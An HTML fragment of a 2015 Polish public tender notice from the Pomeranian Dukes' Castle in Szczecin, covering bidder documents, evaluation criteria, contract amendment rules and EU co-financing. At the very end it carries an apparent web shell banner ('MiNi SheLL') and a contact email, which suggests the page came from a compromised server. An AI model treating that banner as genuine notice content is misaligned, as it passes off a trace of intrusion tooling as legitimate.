<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 65</li>
<li>2 - Parametry techniczne urządzeń oświetleniowych - 27</li>
<li>3 - Gwarancja - 8</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiany treści Umowy będą mogły zostać dokonane tylko w przypadku zaistnienia okoliczności, których wystąpienia Strony nie mogły przewidzieć w chwili zawierania Umowy. Okoliczności te nie mogą być wywołane przez którąkolwiek ze Stron, ani nie mogą być przez Strony zawinione i muszą wywoływać ten skutek, iż Umowa nie może być wykonana zgodnie z pierwotną treścią, 
w szczególności z uwagi na niemożność osiągnięcia celu Umowy lub rażącą stratę, która w przypadku wykonania Umowy groziłaby Stronom bądź jednej ze Stron.
2. Przesłanki do zmiany treści Umowy co do terminu realizacji mogą, między innymi, być wywołane poprzez:
1) zmiany stanu prawnego, w tym w szczególności przepisów podatkowych i z zakresu ochrony środowiska,
2) działanie lub zaniechanie organów władzy publicznej, w tym zmiany urzędowych interpretacji przepisów dot. realizacji lub finansowania przedmiotu umowy,
3) gwałtowną dekoniunkturę, kryzys gospodarczy lub finansowy w skali ponadpaństwowej, 
4) powszechną niedostępność surowców bądź materiałów,
5) brak dostępu do mediów (np. awarie w dostawach energii elektrycznej czy innych mediów niezbędnych do wykonania przedmiotu umowy)
6) klęski żywiołowe i ekologiczne oraz siłę wyższą rozumianą jako zdarzenie nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia (np. zdarzenia losowe, awarie) których przyczyny nie są spowodowane przez żadną ze stron Umowy.
7) inne przyczyny obiektywne niezależne od Zamawiającego i Wykonawcy uniemożliwiające zakończenie dostawy w terminie, (np. opóźnienia w przekazaniu do użytkowania pomieszczenia przeznaczonego do montażu Sprzętu wynikłe z przyczyn wykonawcy robót budowlanych).
3. W przypadku braku gotowości sali do montażu Sprzętu wynikłym z opóźnienia w przekazaniu do użytkowania pomieszczenia z przyczyn leżących po stronie wykonawcy robót budowlanych Zamawiający zastrzega sobie możliwość przesunięcia terminu odbioru Sprzętu do 90 dni od daty upłynięcia terminu o którym mowa w § 2 ust. 1. W tym terminie Sprzęt będzie przechowywany u Wykonawcy na jego koszt. W przypadku przekroczenia tego terminu Zamawiający będzie pokrywał koszty dalszego przechowywania Sprzętu przez Wykonawcę. 
4. Strona narażona na działanie Siły Wyższej nie jest odpowiedzialna za spowodowane tym niewykonanie lub nienależyte wykonanie umowy. Wykonanie umowy może być zawieszone w całości lub w części w razie działania Siły Wyższej. Strona narażona na działanie siły wyższej może również z tego względu odstąpić od umowy, bez prawa do żądania odszkodowania przez drugą stronę.
5. Strona będąca narażona na działanie Siły Wyższej natychmiast poinformuje o tym drugą stronę. Strony podejmą współpracę, aby zminimalizować skutki spowodowane zaistnieniem Siły Wyższej.
6. Wszelkie inne niż wymienione w niniejszym paragrafie niekorzystne dla Zamawiającego zmiany Umowy, dopuszczalne są tylko, jeżeli z powodu nadzwyczajnej zmiany stosunków, spełnienie świadczenia przez Wykonawcę groziłoby mu rażącą stratą, co było niemożliwe do przewidzenia przy zawarciu Umowy.
7. W sytuacjach określonych w ust. 2, 3 i 4, mając na uwadze poszanowanie wzajemnych interesów, zasady równości Stron oraz ekwiwalentności świadczeń i przede wszystkim zgodny zamiar wykonania przedmiotu Umowy, Strony sporządzą aneks do umowy w którym określą w niezbędnym zakresie wpływ powyższych okoliczności na dotychczasowe prawa i obowiązki. 
8. Niezależnie od postanowień ust. 2 i 3 Strony dopuszczają możliwość:
1) zmian polegających na poprawie omyłek pisarskich,
2) zmian redakcyjnych Umowy,
3) zmian będących następstwem sukcesji uniwersalnej albo przejęcia z mocy prawa pełni praw i obowiązków dotyczących którejkolwiek ze Stron, 
4) zmian danych Stron ujawnionych w rejestrach publicznych, 
5) zmian korzystnych z punktu widzenia realizacji Przedmiotu Umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego 
na wykonanie, utrzymanie lub użytkowanie Przedmiotu Umowy bądź zwiększających użyteczność Przedmiotu Umowy. 
9. W takiej sytuacji, Strony wprowadzą do Umowy stosowne zmiany weryfikujące redakcyjnie dotychczasowe brzmienie Umowy bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też, kierując się poszanowaniem wzajemnych interesów, zasadą równości Stron oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu Umowy, określą zmiany korzystne z punktu widzenia realizacji przedmiotu Umowy. 
10. Wszelkie zmiany wprowadzane do Umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art. 140 ust. 3 oraz art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst. jedn. Dz. U. z 2013 r. poz. 907 ze zm.) oraz zasad ogólnych ustawy.
11. Wszelkie zmiany Umowy wymagają zachowania formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zamek-szczecin.top2.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> na wniosek wykonawcy: Zamek Książąt Pomorskich w Szczecinie, ul. Korsarzy 34, 70-540 Szczecin, pokój 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2015 godzina 10:30, miejsce: Zamek Książąt Pomorskich w Szczecinie, ul. Korsarzy 34, 70-540 Szczecin, pokój 206.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia współfinansowany jest ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego na lata 2007-2013, w ramach projektu pn.:Modernizacja skrzydła północnego Zamku Książąt Pomorskich w Szczecinie umowa o dofinansowanie projektu nr UDA-RPZP.06.02.01-32-001/13-00 z dnia 18 września 2013 roku..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com